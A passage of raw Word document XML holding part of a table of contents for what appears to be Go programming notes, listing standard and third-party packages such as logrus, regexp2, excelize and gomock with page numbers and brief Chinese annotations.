              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>286</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C829AEC" w14:textId="611FB0E8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779792" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779792 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>286</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="597E151E" w14:textId="4E0A89A5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779793" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/sirupsen/logrus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779793 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>287</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54FD0161" w14:textId="3CCBCDF8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779794" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>reflect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779794 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>287</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="092ACC25" w14:textId="5B556EDE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779795" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fmt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>288</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49E65C1E" w14:textId="3DBEFB35" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779796" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>regexp</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：正则表达式标准库（无法前视断言）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>288</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2568B8FA" w14:textId="2A96800A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779797" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/dlclark/regexp2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（可以前视断言）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>291</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D8D0CA3" w14:textId="32326C75" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779798" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>embed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>292</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="672A9D6F" w14:textId="731ECFE1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779799" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>292</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68E68B74" w14:textId="6C891B84" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779800" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>math</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>292</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F80E310" w14:textId="49B6AECE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779801" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>strings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>292</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E93DBAB" w14:textId="01E0D0F6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779802" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>encoding:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>处理</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>293</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="495EF687" w14:textId="2D1C2071" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779803" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>crypto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B2476DA" w14:textId="562BDEE0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779804" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/qax-os/excelize.git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：导出</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>excel</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20F072EC" w14:textId="16A047EA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779805" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43758686" w14:textId="7E8D1F6A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779806" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EB6A4C4" w14:textId="43BFC872" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779807" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/golang/mock/gomock</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FDB9DC4" w14:textId="639EAFF2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779808" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>errors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77402245" w14:textId="3580E086" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779809" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>io</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
